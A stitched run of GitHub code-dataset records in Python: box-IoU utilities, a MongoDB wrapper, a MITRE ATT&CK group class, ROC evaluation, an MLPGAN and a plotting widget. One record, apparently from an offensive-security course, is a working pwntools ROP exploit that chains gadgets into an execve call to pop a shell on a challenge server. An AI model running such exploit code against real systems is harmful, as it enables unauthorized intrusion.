0].clamp_(0, img0_shape[1]) # x1\n coords[:, 1].clamp_(0, img0_shape[0]) # y1\n coords[:, 2].clamp_(0, img0_shape[1]) # x2\n coords[:, 3].clamp_(0, img0_shape[0]) # y2\n coords[:, 4].clamp_(0, img0_shape[1]) # x3\n coords[:, 5].clamp_(0, img0_shape[0]) # y3\n coords[:, 6].clamp_(0, img0_shape[1]) # x4\n coords[:, 7].clamp_(0, img0_shape[0]) # y4\n coords[:, 8].clamp_(0, img0_shape[1]) # x5\n coords[:, 9].clamp_(0, img0_shape[0]) # y5\n return coords\n\ndef clip_coords(boxes, img_shape):\n # Clip bounding xyxy bounding boxes to image shape (height, width)\n boxes[:, 0].clamp_(0, img_shape[1]) # x1\n boxes[:, 1].clamp_(0, img_shape[0]) # y1\n boxes[:, 2].clamp_(0, img_shape[1]) # x2\n boxes[:, 3].clamp_(0, img_shape[0]) # y2\n\ndef box_iou(box1, box2):\n # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py\n \"\"\"\n Return intersection-over-union (Jaccard index) of boxes.\n Both sets of boxes are expected to be in (x1, y1, x2, y2) format.\n Arguments:\n box1 (Tensor[N, 4])\n box2 (Tensor[M, 4])\n Returns:\n iou (Tensor[N, M]): the NxM matrix containing the pairwise\n IoU values for every element in boxes1 and boxes2\n \"\"\"\n\n def box_area(box):\n # box = 4xn\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area1 = box_area(box1.T)\n area2 = box_area(box2.T)\n\n # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)\n inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) -\n torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)\n # iou = inter / (area1 + area2 - inter)\n return inter / (area1[:, None] + area2 - inter)\n\ndef bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-9):\n # Returns the IoU of box1 to box2. box1 is 4, box2 is nx4\n box2 = box2.T\n\n # Get the coordinates of bounding boxes\n if x1y1x2y2: # x1, y1, x2, y2 = box1\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]\n else: # transform from xywh to xyxy\n b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2\n b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2\n b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2\n b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2\n\n # Intersection area\n inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \\\n (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)\n\n # Union Area\n w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps\n w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps\n union = w1 * h1 + w2 * h2 - inter + eps\n\n iou = inter / union\n if GIoU or DIoU or CIoU:\n # convex (smallest enclosing box) width\n cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1)\n ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height\n if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1\n c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared\n rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +\n (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared\n if DIoU:\n return iou - rho2 / c2 # DIoU\n elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47\n v = (4 / math.pi ** 2) * \\\n torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)\n with torch.no_grad():\n alpha = v / ((1 + eps) - iou + v)\n return iou - (rho2 / c2 + v * alpha) # CIoU\n else: # GIoU https://arxiv.org/pdf/1902.09630.pdf\n c_area = cw * ch + eps # convex area\n return iou - (c_area - union) / c_area # GIoU\n else:\n return iou # IoU","repo_name":"xinyunmian/face-detection","sub_path":"yolo_face/FaceUtils.py","file_name":"FaceUtils.py","file_ext":"py","file_size_in_byte":11508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74839677927","text":"from struct import pack\n\nfrom pwn import *\n\n\n\nusername = 'aa6243'\n\nbinary_name = './inspector'\n\n\n\n#is_local = True\n\n#is_local_dbg= True\n\nremote_host = 'offsec-chalbroker.osiris.cyber.nyu.edu'\n\nremote_port = 1342\n\n\n\ngdb_script = '''set follow-fork-mode parent\n\nb *0x00400678\n\ncontinue\n\n'''\n\n\n\nshell_cmd = 'whoami'\n\n\n\n#symbol 'cheating'\n\ngadget_1 = 0x00400625\n\ngadget_2 = 0x0040062E\n\ngadget_3 = 0x00400636\n\ngadget_4 = 0x0040063E\n\ngadget_5 = 0x00400646\n\naddr = 0x00400708\n\n\n\nnop = asm('nop', arch=\"amd64\")\n\n\n\ndef gen_payload():\n\n \n payload = nop*40 + p64(gadget_2) + p64(addr) + p64(gadget_3) + p64(0x00000000) + p64(gadget_4) + p64(0x00000000) + p64(gadget_5) + p64(0x0000003b) + p64(gadget_1)\n\n\n return payload\n\n \n\n\n\ndef get_target():\n\n \n\n target = remote(remote_host, remote_port)\n\n target.sendline(username)\n\n return target\n\n\n\n\n\ndef main():\n\n target = get_target()\n\n preamble = target.recvuntil('Please pop a shell!')\n\n #get the shell\n\n target.sendline(gen_payload())\n\n #use the shell\n\n target.sendline(shell_cmd)\n\n #get output\n\n print('shell output: %s' % target.recvline())\n\n #interactive for fun\n\n target.interactive()\n\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"adeenayub/Intro-to-Offensive-Security","sub_path":"Week 9/Inspector/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5048563729","text":"import datetime\nimport logging\n\nimport pymongo\nfrom bson.objectid import ObjectId\nfrom pymongo import ReturnDocument\nfrom typing import Any\nfrom pymongo.errors import DuplicateKeyError\nfrom common.singleton import Singleton\nfrom database.mongo_connector import mongo_connector\n\n__logger__ = logging.getLogger()\n\nTIME_FIELDS = [\n 'last_received',\n 'created_time',\n 'updated_time',\n 'time_received'\n]\n\n\nclass MongoBaseModel(object, metaclass=Singleton):\n db: Any = None\n collection: Any = None\n\n def __init__(self, db, collection):\n self.db = mongo_connector.get_client()[db]\n self.collection = self.db[collection]\n\n def convert_fields(self, item):\n try:\n _id = item.pop('_id', None)\n if _id is not None:\n item['id'] = str(_id)\n\n for time_field in TIME_FIELDS:\n if time_field in item:\n item[time_field] = int(item[time_field].replace(\n tzinfo=datetime.timezone.utc).timestamp())\n except:\n pass\n\n return item\n\n async def create(self, item):\n try:\n time = datetime.datetime.utcnow()\n item['created_time'] = time\n item['updated_time'] = time\n\n return_item = await self.collection.insert_one(item)\n print(\"Return item: \", return_item)\n return_id = str(return_item.inserted_id)\n if return_id:\n item = self.convert_fields(item)\n return item\n else:\n return None\n except DuplicateKeyError as e:\n raise e\n except Exception as e:\n __logger__.error(f'create object failed: {e}')\n return None\n\n async def find_one_and_update(self, filter, update_body):\n try:\n item = await self.collection.find_one_and_update(\n filter,\n {\n \"$currentDate\": {\"updated_time\": True},\n '$set': update_body\n },\n return_document=ReturnDocument.AFTER)\n if item:\n item = self.convert_fields(item)\n return item\n except Exception as e:\n __logger__.error(f'find_and_update object failed: {e}')\n return None\n\n async def find_one(self, filter, exclude_fields=None):\n try:\n _id = filter.pop('_id', None) or filter.pop('id', None)\n if _id and isinstance(_id, str):\n filter['_id'] = ObjectId(_id)\n\n items = await self.get_list(\n filter=filter,\n size=1,\n exclude_fields=exclude_fields\n )\n print(\"Items find one: \", items)\n if items and len(items) > 0:\n return self.convert_fields(items[0])\n\n return None\n except Exception as e:\n __logger__.error(f'find object failed: {e}')\n return None\n\n async def get_list(\n self,\n filter,\n from_id=None,\n size=0,\n skip=0,\n order=[('_id', pymongo.DESCENDING)],\n order_type=None,\n collation=False,\n exclude_fields=[]\n ):\n try:\n conditions = filter\n if not conditions:\n conditions = {}\n exclude_filter = {}\n if exclude_fields:\n exclude_filter = dict((field, 0) for field in exclude_fields)\n if from_id:\n if order_type is None:\n conditions[\"_id\"] = {\"$lt\": ObjectId(from_id)}\n elif order_type == 1:\n conditions[\"_id\"] = {\"$gt\": ObjectId(from_id)}\n elif order_type == -1:\n conditions[\"_id\"] = {\"$lt\": ObjectId(from_id)}\n __logger__.debug(f'filter = + {str(conditions)}')\n if collation:\n cursor = self.collection.find(filter=conditions, projection=exclude_filter, limit=size, skip=skip).sort(order) \\\n .collation({'locale': 'en'})\n else:\n cursor = self.collection.find(\n filter=conditions, projection=exclude_filter, limit=size, skip=skip).sort(order)\n items = []\n for item in await cursor.to_list(length=100):\n item = self.convert_fields(item)\n items.append(item)\n # logger.debug(items)\n return items\n except Exception as e:\n __logger__.error(f'get_list object failed: {e}')\n return None\n\n async def count(self, filter):\n try:\n count = await self.collection.count(filter=filter)\n return count\n except Exception as e:\n __logger__.error(e)\n return None\n\n async def delete_many(self, filter):\n try:\n result = await self.collection.delete_many(filter)\n return result.deleted_count\n except Exception as e:\n __logger__.error(f'delete_many object failed: {e}')\n return None\n","repo_name":"phandc/auto-etl","sub_path":"api-management/model/basemodel.py","file_name":"basemodel.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24344818740","text":"class Group:\n\tID = \"\"\n\tdisplaytitle = \"\"\n\tdescription = \"\"\n\tfullurl = \"\"\n\taliases = []\n\n\tdef __init__(self, ID, displaytitle, description, fullurl, aliases, techniques, software):\n\t\tself.ID = ID\n\t\tself.displaytitle = displaytitle\n\t\tself.description = description\n\t\tself.fullurl = fullurl\n\t\tself.aliases = aliases\n\t\tself.techniques = {}\n\t\tself.software = {}\n\t\tfor tech in techniques:\n\t\t\tself.techniques[tech['fulltext'].split('/')[1]] = tech\n\t\tfor item in software:\n\t\t\tself.software[item['fulltext'].split('/')[1]] = item\n\n\tdef __str__(self):\n\t\treturn \"{}: {}\".format(self.ID, self.displaytitle)\n\n\tdef __repr__(self):\n\t\treturn \"{}: {}\".format(self.ID, self.displaytitle)\n\n\tdef search(self,query):\n\t\tpass","repo_name":"MalwareSoup/MitreAttack","sub_path":"MitreAttack/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"40727653178","text":"import sys\n\nf = open(sys.argv[1], 'r', encoding = \"utf-16\")\nfile = f.read().splitlines()\n\nthis = 0\nelfs = []\nfor line in file:\n\tline = line.strip()\n\tif not line:\n\t\telfs.append(this)\n\t\tthis = 0\n\telse:\n\t\tthis = this + int(line)\nelfs.sort()\nprint(\"part1: \" + str(elfs[-1]))\nprint(\"part2: \" + str(sum(elfs[-3:])))\n","repo_name":"rpehkone/adventofcode","sub_path":"2022/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73277344169","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# from Evaluation.read_bb_files import read_box_MIDV2020_gt_templates\n# from Evaluation.read_bb_files import read_box_MIDV2020_pred_templates\n# from Evaluation.read_bb_files import read_box_MIDV2020_gt\n# from Evaluation.read_bb_files import read_box_MIDV2020_pred\nfrom read_bb_files import read_box_MIDV2020_gt_clips\nfrom read_bb_files import read_box_MIDV2020_pred_clips\nfrom box_iou import box_iou\n# from Evaluation.box_iou import label_pre_bboxes\n# from shutil import copyfile\n# from scipy import interpolate\n#type_dir = \"templates_det\"\n#type_dir = \"shift_scan_det\"\n#type_dir = \"photo_det\"\ntype_dir = \"clips_det\"\nmiss_annotation_file = \"/data/zming/datasets/MIDV2020/MIDV_det_final/clips/miss_annotation_file.txt\"\nfolder = '/data/zming/datasets/MIDV2020/%s/evaluation'%type_dir\nfolder_gt = '/data/zming/datasets/MIDV2020/MIDV_det_final/clips_bbox/annotations/'\n#folder_pred = '/data/zming/datasets/MIDV2020/%s/images/'%type_dir\nfolder_pred = '/data/zming/datasets/MIDV2020/MIDV_det_final/%s/images/'%type_dir\n\n#file_path = 'evaluate_pcn_MIDV_v5_calibrate.txt'\nfile_path = 'evaluate_mtcnn_MIDV_v5_calibrate.txt'\n#file_path = 'MIDV-500-outList_cascade_v6_calibrate.txt'\n\n#result='/data/zming/logs/CBDAR/'\nresult = '/data/zming/datasets/MIDV2020/%s/evaluation'%type_dir\n\nIOU_THRESHOLD = 0.7\ndef calcu_roc(gt_bboxes, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images):\n scale_roc = 1000\n #scale_roc = 100\n TP = np.zeros(scale_roc)\n FP = np.zeros(scale_roc)\n PRECI = np.zeros(scale_roc)\n TPR = np.zeros(scale_roc)\n P = np.zeros(scale_roc)\n tp_images = []\n fp_images = []\n\n nrof_gt = 0\n for gt_bb in gt_bboxes:\n nrof_gt += len(gt_bb)\n GT = nrof_gt\n\n confi_scale = np.arange(0,1,1.0/scale_roc)\n confi_scale = confi_scale[::-1]\n\n # ## sort the pre_bboxes_iou according to the confidence\n # idx_sort = np.argsort(np.array(pre_bboxes_confidence))\n # pre_bboxes_confidence_sort = pre_bboxes_confidence(idx_sort)\n # pre_bboxes_label_sort = np.array(pre_bboxes_label)(idx_sort)\n # nrof_pre_bboxes = len(pre_bboxes_label_sort)\n\n\n for i, confi in enumerate(confi_scale):\n print(\"Evaluation: %f [%d/%d]\"%(confi, i, scale_roc))\n predict_bb_confi = np.greater(pre_bboxes_confidence, confi)\n nrof_predict_bb_confi = np.sum(predict_bb_confi) ## positive bbox, i.e. confidence > threshold\n\n predict_bb_label = np.equal(pre_bboxes_label, 1)\n predict_bb = np.logical_and(predict_bb_confi, predict_bb_label)\n\n idx = range(len(predict_bb_label))\n idx_predic_bb = np.array(idx)[predict_bb]\n\n gt_recall_bboxes = np.array(gt_recall_bboxes_idx)[idx_predic_bb]\n gt_recall_bboxes_set = set (tuple(x) for x in gt_recall_bboxes)\n tp = len(gt_recall_bboxes_set) ## true positive bbox\n\n # ########### Find the tp images and fp images #########################\n # pre_iou_images_confi = np.array(pre_iou_images)[predict_bb_confi]\n # pre_iou_images_almost_tp = np.array(pre_iou_images)[predict_bb]\n # gt_recall_bboxes_set_idx = []\n # for x in gt_recall_bboxes_set:\n # notfind = True\n # j = 0\n # while(notfind):\n # xx = gt_recall_bboxes_idx[i]\n # if (np.array(x) == xx).all():\n # gt_recall_bboxes_set_idx.append(i)\n # notfind = False\n # j += 1\n # tp_images = np.array(pre_iou_images)[gt_recall_bboxes_set_idx]\n # fp_images = np.array(pre_iou_images)[predict_bb_confi]\n # fp_images = [x for x in fp_images if not x in tp_images]\n # tp_images.sort()\n # fp_images.sort()\n\n # save_tp_images_path = os.path.join(result, 'tp_images')\n # if not os.path.exists(save_tp_images_path):\n # os.mkdir(save_tp_images_path)\n # for img in tp_images:\n # # img = img.replace('/','_')\n # # copyfile(os.path.join(folder, file_path[:-4], img), os.path.join(save_tp_images_path, img))\n # img_name = str.split(img, '/')[-1]\n # copyfile(img, os.path.join(save_tp_images_path, img_name))\n #\n # save_fp_images_path = os.path.join(result, 'fp_images')\n # if not os.path.exists(save_fp_images_path):\n # os.mkdir(save_fp_images_path)\n # for img in fp_images:\n # # img = img.replace('/','_')\n # #copyfile(os.path.join(folder, file_path[:-4], img), os.path.join(save_fp_images_path, img))\n # img_name = str.split(img, '/')[-1]\n # copyfile(img, os.path.join(save_fp_images_path, img_name))\n\n ##############################################################################\n\n p = nrof_predict_bb_confi\n fp = p - tp\n if p == 0:\n pr = 1.0\n else:\n pr = float(tp)/p\n tpr = float(tp)/GT\n\n TP[i] = tp\n FP[i] = fp\n PRECI[i] = pr\n TPR[i] = tpr\n P[i] = p\n\n AP = np.mean(PRECI)\n\n\n\n\n return TP, FP, TPR, PRECI, P, AP, tp_images, fp_images\n\n\ndef main():\n if not os.path.isdir(result):\n os.mkdir(result)\n result_path = os.path.join(result, \"iou_%.1f\"%IOU_THRESHOLD)\n if not os.path.isdir(result_path):\n os.mkdir(result_path)\n gt_bb_principal = read_box_MIDV2020_gt_clips(folder_gt)\n pred_bb_principal, pre_bb_images =read_box_MIDV2020_pred_clips(folder_pred, miss_annotation_file)\n #pred_bb_principal, pre_bb_images =read_box_MIDV2020_pred_templates(folder_pred)\n #pre_bboxes_iou, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images = box_iou(gt_bb_all, pre_bb, pre_bb_images)\n pre_bboxes_iou, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images = box_iou(gt_bb_principal, pred_bb_principal, pre_bb_images, IOU_THRESHOLD)\n\n # nrof_gt_bb = len(gt_bb_all)\n # TP, FP, TPR, PRECI, P, _, _ = calcu_roc(gt_bb_all, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images)\n nrof_gt_bb = len(gt_bb_principal)\n TP, FP, TPR, PRECI, P, AP, _, _ = calcu_roc(gt_bb_principal, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images)\n with open(os.path.join(result_path, 'ROC_PR_%s.txt'%file_path[:-4]), 'w') as f:\n f.write('AP@IoU: %f@%f\\n'%(AP, IOU_THRESHOLD))\n f.write('TP FP P TPR PRECI\\n')\n for i in range(len(TP)):\n f.write('%d %d %d %f %f \\n'%(TP[i],FP[i], P[i], TPR[i],PRECI[i]))\n\n ## plot ROC\n # f = interpolate.interp1d(FP, TPR)\n # FP_new = np.linspace(0,max(FP),1001)\n # TPR_new = f(FP_new)\n fig = plt.figure()\n plt.plot(FP, TPR)\n plt.xlabel('False Positive')\n plt.ylabel('True Positive Rate/Recall')\n plt.legend(loc='lower right')\n #plt.show()\n fig.savefig(os.path.join(result_path, 'ROC_%s.png'%file_path[:-4]))\n\n ## plot PR\n for i in range(len(PRECI)):\n PRECI[i] = max(PRECI[i:])\n # f = interpolate.interp1d(TPR, PRECI)\n # TPR_new = np.linspace(0,1,1001)\n # PRECI_new = f(TPR_new)\n fig = plt.figure()\n plt.plot(TPR, PRECI)\n plt.xlabel('True Positive Rate/Recall')\n plt.ylabel('Precision')\n plt.legend(loc='lower right')\n #plt.show()\n fig.savefig(os.path.join(result_path, 'P-R_%s.png'%file_path[:-4]))\n\n\n\n\n\n\n\n\n\n\n\nif __name__== '__main__':\n main()\n\n","repo_name":"hengxyz/MIDV_2020_det","sub_path":"Evaluation/Evaluate_ROC.py","file_name":"Evaluate_ROC.py","file_ext":"py","file_size_in_byte":7400,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"72565550247","text":"import torch as t\nimport torch.nn as nn\nimport torch.utils.data as d_utils\nimport torchvision.utils as tv_utils\nfrom ..Utilities import utilities as u\nfrom torch.autograd import Variable as V\n\n\nclass MLPGAN(object):\n def __init__(self, image_size, n_z, n_chan, hiddens, depths, ngpu, loss='BCE'):\n \"\"\"\n MLPGAN object. This class is a wrapper of a generalized MLPGAN.\n Instance of this class initializes the Generator and the Discriminator.\n Arguments:\n image_size = Height / width of the real images\n n_z = Dimensionality of the latent space\n n_chan = Number of channels of the real images\n hiddens = Number of nodes in the hidden layers of the generator and discriminator\n Format:\n hiddens = {'gen': n_gen_hidden,\n 'dis': n_dis_hidden}\n depths = Number of fully connected layers in the generator and discriminator\n Format:\n depths = {'gen': n_gen_depth,\n 'dis': n_dis_depth}\n ngpu = Number of gpus to allocated, if to be run on gpu\n loss (opt) = The loss function to be used. Default is BCE loss\n \"\"\"\n super(MLPGAN, self).__init__()\n self.Gen_net = Generator(image_size, n_z, n_chan, hiddens['gen'], depths['gen'], ngpu)\n self.Dis_net = Discriminator(image_size, n_chan, hiddens['dis'], depths['dis'], ngpu)\n self.ngpu = ngpu\n self.n_z = n_z\n self.image_size = image_size\n self.n_chan = n_chan\n if loss == 'BCE':\n self.loss = nn.BCELoss()\n elif loss == 'MSE':\n self.loss = nn.MSELoss()\n\n def train(self, dataset, batch_size, n_iters, optimizer_details, show_period=50,\n display_images=True, misc_options=['init_scheme', 'save_model']):\n \"\"\"\n Train function of the MLPGAN class. This starts training the model.\n Arguments:\n dataset = torch.utils.data.Dataset instance\n batch_size = batch size to be used throughout the training\n n_iters = Number of generator iterations to run the training for\n optimizer_details = Dictionary representing the details for optimizers for generator and discriminator\n Format:\n optimizer_details = {'gen':\n {'name' : Name of optimizer,\n 'learn_rate' : learning rate,\n 'betas' : (beta_1, beta_2), => Optional, if using Adam/Adamax\n 'momentum' : momentum, => Optional, if using momentum SGD/NAG\n 'nesterov' : True/False, => Optional, if using NAG},\n 'dis':\n }\n show_period (opt) = Prints the errors with current iteration number every show_period iterations\n display_images (opt) = If true, saves the real, reconstructed and generated images\n from noise every show_period*5 iterations\n misc_options (opt) = List of strings.\n - Add 'init_scheme' to the list, if you want to implement\n specific initialization schemes\n - Add 'save_model' to the list, if you want to save the model\n after n_iters iterations of training\n \"\"\"\n optimizer_details['gen']['params'] = self.Gen_net.parameters()\n optimizer_details['dis']['params'] = self.Dis_net.parameters()\n G_optmzr = u.get_optimizer_with_params(optimizer_details['gen'])\n D_optmzr = u.get_optimizer_with_params(optimizer_details['dis'])\n\n inpt = t.FloatTensor(batch_size, self.n_chan, self.image_size, self.image_size)\n noise = t.FloatTensor(batch_size, self.n_z, 1, 1)\n label = t.FloatTensor(batch_size)\n if display_images:\n fixed_noise = t.randn(batch_size, self.n_z, 1, 1)\n\n if 'init_scheme' in misc_options:\n self.Gen_net.apply(u.weight_init_scheme)\n self.Dis_net.apply(u.weight_init_scheme)\n\n if self.ngpu > 0:\n inpt = inpt.cuda()\n noise = noise.cuda()\n label = label.cuda()\n if display_images:\n fixed_noise = fixed_noise.cuda()\n\n self.Gen_net = self.Gen_net.cuda()\n self.Dis_net = self.Dis_net.cuda()\n\n d_loader = d_utils.DataLoader(dataset, batch_size, shuffle=True)\n\n # Train loop\n # Details to be followed:\n # 1. Train the discriminator first. Train the discriminator with reals and then with fakes\n # 2. Train the generator after training the discriminator.\n\n gen_iters = 0\n flag = False\n print('Training has started')\n while not flag:\n for i, itr in enumerate(d_loader):\n\n # Training the discriminator\n # We don't want to evaluate the gradients for the Generator during Discriminator training\n self.Dis_net.zero_grad()\n\n # Training with reals. These are obviously true in the discriminator's POV\n X, _ = itr\n if inpt.size() != X.size():\n inpt.resize_(X.size(0), X.size(1), X.size(2), X.size(3))\n inpt.copy_(X)\n label.fill_(1)\n\n inptV = V(inpt)\n labelV = V(label)\n\n otpt = self.Dis_net(inptV)\n err_D_r = self.loss(otpt, labelV)\n err_D_r.backward()\n\n # Training with fakes. These are false in the discriminator's POV\n\n # We want same amount of fake data as real data\n if noise.size(0) != inpt.size(0):\n noise.resize_(inpt.size(0), noise.size(1), noise.size(2), noise.size(3))\n noise.normal_(0, 1)\n label.fill_(0)\n\n noiseV = V(noise)\n labelV = V(label)\n\n X_f = self.Gen_net(noiseV.detach())\n otpt = self.Dis_net(X_f)\n err_D_f = self.loss(otpt, labelV)\n err_D_f.backward()\n err_D = err_D_r + err_D_f\n D_optmzr.step()\n\n # Training the generator\n # We don't want to evaluate the gradients for the Discriminator during Generator training\n\n self.Gen_net.zero_grad()\n\n # The fake are reals in the Generator's POV\n label.fill_(1)\n\n labelV = V(label)\n\n X_gen = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_gen)\n err_G = self.loss(otpt, labelV)\n err_G.backward()\n G_optmzr.step()\n\n gen_iters = gen_iters + 1\n\n # Showing the Progress every show_period iterations\n if gen_iters % show_period == 0:\n print('[{0}/{1}]\\tDiscriminator Error:\\t{2}\\tGenerator Error:\\t{3}'\n .format(gen_iters, n_iters, round(err_D.data[0], 5), round(err_G.data[0], 5)))\n\n # Saving the generated images every show_period*5 iterations\n if display_images:\n if gen_iters % (show_period * 5) == 0:\n gen_imgs = self.Gen_net(V(fixed_noise))\n\n # Normalizing the images to look better\n if self.n_chan > 1:\n gen_imgs.data = gen_imgs.data.mul(0.5).add(0.5)\n tv_utils.save_image(gen_imgs.data,\n 'Generated_images@iteration={0}.png'.format(gen_iters))\n\n if gen_iters == n_iters:\n flag = True\n break\n\n if 'save_model' in misc_options and flag:\n t.save(self.Gen_net.state_dict(), 'MLPGAN_Gen_net_trained_model.pth')\n t.save(self.Dis_net.state_dict(), 'MLPGAN_Dis_net_trained_model.pth')\n print('Training over and model(s) saved')\n\n elif flag:\n print('Training is over')\n\n\nclass Generator(nn.Module):\n def __init__(self, image_size, n_z, n_chan, n_hidden, depth, ngpu):\n super(Generator, self).__init__()\n\n self.image_size = image_size\n self.n_z = n_z\n self.n_hidden = n_hidden\n self.n_chan = n_chan\n self.depth = depth\n self.ngpu = ngpu\n\n layer = 1\n main = nn.Sequential()\n\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_z, n_hidden), nn.Linear(n_z, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n while layer < depth - 1:\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, n_hidden),\n nn.Linear(n_hidden, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n layer = layer + 1\n image_dim = image_size * image_size * n_chan\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, image_dim),\n nn.Linear(n_hidden, image_dim))\n main.add_module('Tanh_{0}'.format(layer), nn.Tanh())\n\n self.main = main\n\n def forward(self, input):\n input = input.view(-1, self.n_z)\n if self.ngpu > 0:\n output = nn.parallel.data_parallel(self.main, input, range(0, self.ngpu))\n else:\n output = self.main(input)\n return output.view(-1, self.n_chan, self.image_size, self.image_size)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, image_size, n_chan, n_hidden, depth, ngpu):\n super(Discriminator, self).__init__()\n\n self.image_size = image_size\n self.n_chan = n_chan\n self.n_hidden = n_hidden\n self.depth = depth\n self.ngpu = ngpu\n\n layer = 1\n image_dim = image_size * image_size * n_chan\n main = nn.Sequential()\n\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, image_dim, n_hidden),\n nn.Linear(image_dim, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n while layer < depth - 1:\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, n_hidden),\n nn.Linear(n_hidden, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, 1), nn.Linear(n_hidden, 1))\n main.add_module('Sigmoid_{0}'.format(layer), nn.Sigmoid())\n\n self.main = main\n\n def forward(self, input):\n input = input.view(-1, self.n_chan*self.image_size*self.image_size)\n if self.ngpu > 0:\n output = nn.parallel.data_parallel(self.main, input, range(0, self.ngpu))\n else:\n output = self.main(input)\n return output.view(-1, 1)\n","repo_name":"DL-IT/generative_zoo","sub_path":"Modules/MLPGAN.py","file_name":"MLPGAN.py","file_ext":"py","file_size_in_byte":11335,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"17889117397","text":"import numpy as np\nfrom warnings import warn\n\nfrom .base import BaseWidget, to_attr\nfrom .utils import get_unit_colors\n\n\nclass ConfusionMatrixWidget(BaseWidget):\n \"\"\"\n Plots sorting comparison confusion matrix.\n\n Parameters\n ----------\n gt_comparison: GroundTruthComparison\n The ground truth sorting comparison object\n count_text: bool\n If True counts are displayed as text\n unit_ticks: bool\n If True unit tick labels are displayed\n\n \"\"\"\n\n def __init__(self, gt_comparison, count_text=True, unit_ticks=True, backend=None, **backend_kwargs):\n plot_data = dict(\n gt_comparison=gt_comparison,\n count_text=count_text,\n unit_ticks=unit_ticks,\n )\n BaseWidget.__init__(self, plot_data, backend=backend, **backend_kwargs)\n\n def plot_matplotlib(self, data_plot, **backend_kwargs):\n import matplotlib.pyplot as plt\n from .utils_matplotlib import make_mpl_figure\n\n dp = to_attr(data_plot)\n\n self.figure, self.axes, self.ax = make_mpl_figure(**backend_kwargs)\n\n comp = dp.gt_comparison\n\n confusion_matrix = comp.get_confusion_matrix()\n N1 = confusion_matrix.shape[0] - 1\n N2 = confusion_matrix.shape[1] - 1\n\n # Using matshow here just because it sets the ticks up nicely. imshow is faster.\n self.ax.matshow(confusion_matrix.values, cmap=\"Greens\")\n\n if dp.count_text:\n for (i, j), z in np.ndenumerate(confusion_matrix.values):\n if z != 0:\n if z > np.max(confusion_matrix.values) / 2.0:\n self.ax.text(j, i, \"{:d}\".format(z), ha=\"center\", va=\"center\", color=\"white\")\n else:\n self.ax.text(j, i, \"{:d}\".format(z), ha=\"center\", va=\"center\", color=\"black\")\n\n self.ax.axhline(int(N1 - 1) + 0.5, color=\"black\")\n self.ax.axvline(int(N2 - 1) + 0.5, color=\"black\")\n\n # Major ticks\n self.ax.set_xticks(np.arange(0, N2 + 1))\n self.ax.set_yticks(np.arange(0, N1 + 1))\n self.ax.xaxis.tick_bottom()\n\n # Labels for major ticks\n if dp.unit_ticks:\n 